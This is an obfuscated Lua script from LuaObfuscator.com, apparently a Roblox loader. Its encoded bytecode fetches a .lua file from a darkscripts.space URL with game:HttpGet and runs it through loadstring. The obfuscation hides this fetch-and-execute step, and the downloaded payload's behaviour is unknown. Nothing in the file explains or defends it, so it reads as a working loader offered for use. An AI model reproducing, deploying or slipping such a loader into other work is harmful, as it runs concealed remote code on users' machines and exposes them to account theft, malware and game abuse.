--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v81=0;local v82;while true do if (v81==0) then v82=v2(v0(v30,16));if v19 then local v98=0;local v99;while true do if (v98==1) then return v99;end if (v98==0) then v99=v5(v82,v19);v19=nil;v98=1;end end else return v82;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v83=0 -0 ;local v84;while true do if (v83==(0 -0)) then v84=(v31/(((3 -0) -1)^(v32-1)))%((4 -2)^(((v33-(620 -(555 + 64))) -(v32-(932 -(857 + 74)))) + (569 -(367 + 201)))) ;return v84-(v84%(928 -(214 + 713))) ;end end else local v85=0 + 0 ;local v86;while true do if (v85==0) then v86=(1 + 1)^(v32-((1943 -(68 + 997)) -(282 + 595))) ;return (((v31%(v86 + v86))>=v86) and (1638 -(1523 + 114))) or (0 + (1270 -(226 + 1044))) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=(350 -(87 + 263)) -(180 -(67 + 113)) ;local v36;local v37;while true do if (v35==(118 -(32 + 85))) then return (v37 * (251 + 5)) + v36 ;end if (v35==(0 -(0 + 0))) then v36,v37=v1(v16,v18,v18 + 1 + 1 );v18=v18 + (3 -1) ;v35=1 -0 ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (7 -4) );v18=v18 + 3 + (2 -1) ;return (v41 * 16777216) + (v40 * (260471 -194935)) + (v39 * (1208 -(802 + 150))) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=1;local v45=(v20(v43,1 -0 ,15 + 5 ) * ((999 -(915 + 82))^(90 -58))) + v42 ;local v46=v20(v43,10 + 11 ,19 + 12 );local v47=((v20(v43,41 -9 )==(1188 -(1069 + 118))) and  -(2 -1)) or (1 -0) ;if (v46==((0 -0) + (438 -(145 + 293)))) then if (v45==(0 -0)) then return v47 * 0 ;else v46=1 + 0 ;v44=(1221 -(44 + 386)) -(368 + 423) ;end elseif (v46==(6433 -4386)) then return ((v45==(18 -(10 + (1494 -(998 + 488))))) and (v47 * ((3 -2)/((141 + 301) -(416 + 26))))) or (v47 * NaN) ;end return v8(v47,v46-1023 ) * (v44 + (v45/(2^(165 -(93 + 20))))) ;end local function v25(v48) local v49;if  not v48 then local v87=772 -(201 + (2084 -1513)) ;while true do if (v87==(1138 -(116 + 1022))) then v48=v23();if (v48==0) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -(4 -(10 -7)) );v18=v18 + v48 ;local v50={};for v64=(860 -(814 + 45)) + (0 -0) , #v49 do v50[v64]=v2(v1(v3(v49,v64,v64)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return 0 + 0 ;end)();local v52=(function() return;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();while true do local v66=(function() return 0 -0 ;end)();while true do if (v66~=1) then else if (v51==(6 -4)) then for v100= #"!",v23() do local v101=(function() return v21();end)();if (v20(v101, #">", #"|")==0) then local v104=(function() return 374 -(123 + 251) ;end)();local v105=(function() return;end)();local v106=(function() return;end)();local v107=(function() return;end)();while true do if (v104==2) then if (v20(v106, #"{", #"]")~= #",") then else v107[9 -7 ]=(function() return v57[v107[2]];end)();end if (v20(v106,700 -(208 + 490) ,1 + 1 )== #">") then v107[ #"nil"]=(function() return v57[v107[ #"19("]];end)();end v104=(function() return 3;end)();end if (v104==1) then v107=(function() return {v22(),v22(),nil,nil};end)();if (v105==0) then local v164=(function() return 0 + 0 ;end)();local v165=(function() return;end)();while true do if (v164==(836 -(660 + 176))) then v165=(function() return 0 + 0 ;end)();while true do if (v165~=0) then else v107[ #"xxx"]=(function() return v22();end)();v107[ #"xnxx"]=(function() return v22();end)();break;end end break;end end elseif (v105== #"}") then v107[ #"19("]=(function() return v23();end)();elseif (v105==(204 -(14 + 188))) then v107[ #"19("]=(function() return v23() -(2^16) ;end)();elseif (v105== #"-19") then local v176=(function() return 0;end)();local v177=(function() return;end)();while true do if (v176~=0) then else v177=(function() return 675 -(534 + 141) ;end)();while true do if (v177==(0 + 0)) then v107[ #"xxx"]=(function() return v23() -((2 + 0)^(16 + 0)) ;end)();v107[ #"xnxx"]=(function() return v22();end)();break;end end break;end end end v104=(function() return 3 -1 ;end)();end if ((0 -0)==v104) then local v146=(function() return 0 -0 ;end)();while true do if (v146==(1 + 0)) then v104=(function() return 1;end)();break;end if ((0 + 0)==v146) then v105=(function() return v20(v101,398 -(115 + 281) , #"asd");end)();v106=(function() return v20(v101, #"asd1",6);end)();v146=(function() return 2 -1 ;end)();end end end if (v104~=(3 + 0)) then else if (v20(v106, #"xxx", #"gha")== #"|") then v107[ #"0313"]=(function() return v57[v107[ #".com"]];end)();end v52[v100]=(function() return v107;end)();break;end end end end for v102= #" ",v23() do v53[v102-#"|" ]=(function() return v28();end)();end return v55;end break;end if (v66~=(0 -0)) then else if (v51==(0 -0)) then local v95=(function() return 867 -(550 + 317) ;end)();local v96=(function() return;end)();while true do if (v95~=0) then else v96=(function() return 0 -0 ;end)();while true do if (v96~=(2 -0)) then else v51=(function() return  #"\\";end)();break;end if (1~=v96) then else v54=(function() return {};end)();v55=(function() return {v52,v53,nil,v54};end)();v96=(function() return 2;end)();end if (v96==0) then v52=(function() return {};end)();v53=(function() return {};end)();v96=(function() return 2 -1 ;end)();end end break;end end end if (v51== #"!") then local v97=(function() return 0;end)();while true do if (v97~=2) then else v51=(function() return 287 -(134 + 151) ;end)();break;end if (v97==1) then for v109= #",",v56 do local v110=(function() return 0;end)();local v111=(function() return;end)();local v112=(function() return;end)();local v113=(function() return;end)();while true do if (v110==0) then local v148=(function() return 1665 -(970 + 695) ;end)();while true do if ((0 -0)==v148) then v111=(function() return 1990 -(582 + 1408) ;end)();v112=(function() return nil;end)();v148=(function() return 1;end)();end if (v148==(3 -2)) then v110=(function() return 1 -0 ;end)();break;end end end if (v110~=(3 -2)) then else v113=(function() return nil;end)();while true do if (v111~=(1824 -(1195 + 629))) then else local v171=(function() return 0;end)();while true do if (v171~=1) then else v111=(function() return  #"~";end)();break;end if (v171==(0 -0)) then v112=(function() return v21();end)();v113=(function() return nil;end)();v171=(function() return 1;end)();end end end if (v111== #"}") then if (v112== #"~") then v113=(function() return v21()~=0 ;end)();elseif (v112==2) then v113=(function() return v24();end)();elseif (v112== #"gha") then v113=(function() return v25();end)();end v57[v109]=(function() return v113;end)();break;end end break;end end end v55[ #"asd"]=(function() return v21();end)();v97=(function() return 243 -(187 + 54) ;end)();end if (v97~=(780 -(162 + 618))) then else v56=(function() return v23();end)();v57=(function() return {};end)();v97=(function() return 1 + 0 ;end)();end end end v66=(function() return 1;end)();end end end end local function v29(v58,v59,v60) local v61=v58[1 + (65 -(30 + 35)) ];local v62=v58[3 -(1 + 0) ];local v63=v58[(1261 -(1043 + 214)) -1 ];return function(...) local v67=v61;local v68=v62;local v69=v63;local v70=v27;local v71=1 + 0 ;local v72= -(1637 -(1373 + 263));local v73={};local v74={...};local v75=v12("#",...) -(1 + 0) ;local v76={};local v77={};for v88=0 -0 ,v75 do if ((v88>=v69) or (1804>=3275)) then v73[v88-v69 ]=v74[v88 + (1 -0) ];else v77[v88]=v74[v88 + (1385 -(746 + 638)) ];end end local v78=(v75-v69) + 1 + 0 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1 -0 ];if (v80<=7) then if (v80<=(344 -((824 -606) + 123))) then if (v80<=(1582 -((2747 -(323 + 889)) + 46))) then if (v80==0) then do return;end else v77[v79[2 + 0 ]]=v79[1 + 2 ]~=(560 -(306 + 254)) ;end elseif ((v80>2) or (1417>3629)) then local v115=v79[1 + 1 ];local v116,v117=v70(v77[v115](v13(v77,v115 + (1 -0) ,v79[1470 -(899 + 568) ])));v72=(v117 + v115) -1 ;local v118=0 + 0 ;for v143=v115,v72 do v118=v118 + (2 -1) ;v77[v143]=v116[v118];end else v77[v79[605 -(268 + (901 -566)) ]]();end elseif ((4795>402) and (v80<=5)) then if (v80==4) then v77[v79[(872 -(361 + 219)) -(60 + 230) ]]=v79[575 -(426 + 146) ];else v77[v79[1 + 1 ]]=v79[1459 -(282 + 1174) ]~=((1131 -(53 + 267)) -(569 + 242)) ;end elseif (v80==(17 -11)) then local v122=0 + 0 ;local v123;while true do if (v122==(1024 -(706 + 318))) then v123=v79[1253 -(163 + 558 + 530) ];v77[v123]=v77[v123](v13(v77,v123 + (1272 -(945 + (739 -(15 + 398)))) ,v72));break;end end else local v124=0 -0 ;local v125;local v126;while true do if ((1 + 0)==v124) then v77[v125 + (701 -(271 + 429)) ]=v126;v77[v125]=v126[v79[4 + 0 ]];break;end if (v124==(1500 -(1408 + 92))) then v125=v79[1088 -((1443 -(18 + 964)) + (2352 -1727)) ];v126=v77[v79[1291 -(993 + 295) ]];v124=1 + 0 ;end end end elseif (v80<=(1182 -(418 + 753))) then if ((4813>3565) and (v80<=(3 + 1 + 5))) then if ((3912==3912) and (v80==(1 + 7))) then do return;end else v77[v79[1 + 1 ]]=v79[1 + 0 + 2 ];end elseif ((2821<=4824) and (v80==(539 -(406 + 123)))) then local v129=1769 -(1749 + (870 -(20 + 830))) ;local v130;local v131;local v132;local v133;while true do if ((1738<=2195) and (v129==(1 + 1))) then for v167=v130,v72 do v133=v133 + (1323 -(1249 + 73)) ;v77[v167]=v131[v133];end break;end if (v129==0) then v130=v79[1 + 1 ];v131,v132=v70(v77[v130](v13(v77,v130 + (1146 -(466 + 531 + 148)) ,v79[6 -(129 -(116 + 10)) ])));v129=1;end if (v129==(2 -(1 + 0))) then v72=(v132 + v130) -(1901 -(106 + (2532 -(542 + 196)))) ;v133=0 + 0 ;v129=1 + (1 -0) ;end end else v77[v79[2]]=v60[v79[8 -5 ]];end elseif (v80<=(34 -21)) then if (v80==12) then local v136=v79[116 -(4 + 110) ];v77[v136]=v77[v136](v13(v77,v136 + (585 -(57 + 527)) ,v72));else v77[v79[1429 -(41 + 1386) ]]=v60[v79[106 -(17 + 86) ]];end elseif ((41<=3018) and (v80==(10 + 4))) then local v140=0 -0 ;local v141;local v142;while true do if (v140==(2 -1)) then v77[v141 + (167 -(36 + 86 + 44)) ]=v142;v77[v141]=v142[v79[6 -2 ]];break;end if (v140==(0 -0)) then v141=v79[2];v142=v77[v79[3 + 0 ]];v140=1 + 0 ;end end else v77[v79[3 -(1 + 0) ]]();end v71=v71 + 1 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574035D3Q00682Q7470733A2Q2F6461726B736372697074732E73706163652F736372697074732F32313830353039622D613166652D2Q3435662D622Q34352D3366343162632Q66333133315F38343933363831373436333638322Q3635362E6C756100093Q00120B3Q00013Q00120B000100023Q002007000100010003001209000300044Q0005000400014Q0003000100044Q000C5Q00022Q000F3Q000100012Q00083Q00017Q00",v9(),...);
